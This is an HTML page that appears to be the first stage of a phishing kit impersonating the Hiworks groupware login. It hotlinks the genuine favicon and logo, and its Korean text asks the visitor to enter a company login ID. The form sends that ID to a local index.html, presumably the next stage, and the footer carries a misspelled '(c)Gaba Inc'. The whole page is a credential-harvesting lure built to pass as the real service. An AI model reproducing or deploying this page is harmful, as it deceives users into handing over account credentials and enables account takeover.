<html lang="ko">

<head>
  <meta http-equiv="Content-Language" content="en-us">
  <meta charset="UTF-8" />
  <link rel="icon" href="https://login.office.hiworks.com/favicon-96x96.png" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>&#54616;&#51060;&#50893;&#49828; &#47196;&#44536;&#51064;</title>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=login]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 40px;
  width: 400px;
  padding: 8 15px;
  margin: 0;
  background: white;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  background-color: white;
  background-image: url("img/id.png");
  background-position: 1px 2px; 
  background-repeat: no-repeat;
  padding: 10px 35px;
  }
  input[type=login]:focus {
  outline: none;
  border: 1px solid #2985db;
  }
</style>
<body bgcolor="#F8F9FB">

<table border="0" width="100%" cellspacing="0" cellpadding="0">
	<tr>
		<td>&nbsp;</td>
	</tr>
	<tr>
		<td>
		<div align="center">
			<table border="0" width="1170" cellspacing="0" cellpadding="0">
				<tr>
					<td width="100">
					<img border="0" src="https://static.hiworks.com/asp/files/logo.svg" width="104" height="22"></td>
					<td>&nbsp;</td>
				</tr>
			</table>
		</div>
		</td>
	</tr>
	<tr>
		<td>
		<div align="center">
			<table border="0" width="100" cellspacing="0" cellpadding="0">
				<tr>
					<td>
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
				  <form action="index.html" method="get">
					<tr>
						<td height="126"></td>
					</tr>
					<tr>
						<td height="38">
						<p align="center"><b><font size="6">&#47196;&#44536;&#51064;</font></b></td>
					</tr>
					<tr>
						<td height="14"></td>
					</tr>
					<tr>
						<td>
						<p align="center"><font size="2">&#46020;&#47700;&#51064;&#51012; &#54252;&#54632;&#54620; 
						<span class="font-bold">&#47196;&#44536;&#51064; ID</span>&#47484; &#51077;&#47141;&#54616;&#49464;&#50836;.</font></td>
					</tr>
					<tr>
						<td height="40">&nbsp;</td>
					</tr>
					<tr>
						<td width="400" height="40">
						   <input type="login" required placeholder="id@company.onhiworks.com" name="login" value="" autofocus>
						</td>
					</tr>
					<tr>
						<td height="20"></td>
					</tr>
					<tr>
						<td>
						<input type="image" src="img/btn.png" width="400" height="44" name="I1"></td>
					</tr>
					<tr>
						<td height="27"></td>
					</tr>
					<tr>
						<td height="27">
				                <table border="0" width="100%" cellspacing="0" cellpadding="0">
					<tr>
						<td height="20"></td>
					</tr>
					<tr>
						<td>
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td width="142">
								<img border="0" src="img/mgs-1.png" width="400" height="24"></td>
								<td>&nbsp;</td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="110"></td>
					</tr>
					<tr>
						<td>
						<p align="center"><font face="Arial" color="#C0C0C0">
						<font size="2">(c)</font>Gaba Inc</font></td>
					</tr>
				</table>
						</td>
					</tr>
					</form>
				</table>
					</td>
				</tr>
			</table>
		</div>
		</td>
	</tr>
	
	<tr>
		<td>
		&nbsp;</td>
	</tr>
	<tr>
		<td>&nbsp;</td>
	</tr>
	
</table>

</body>

</html>
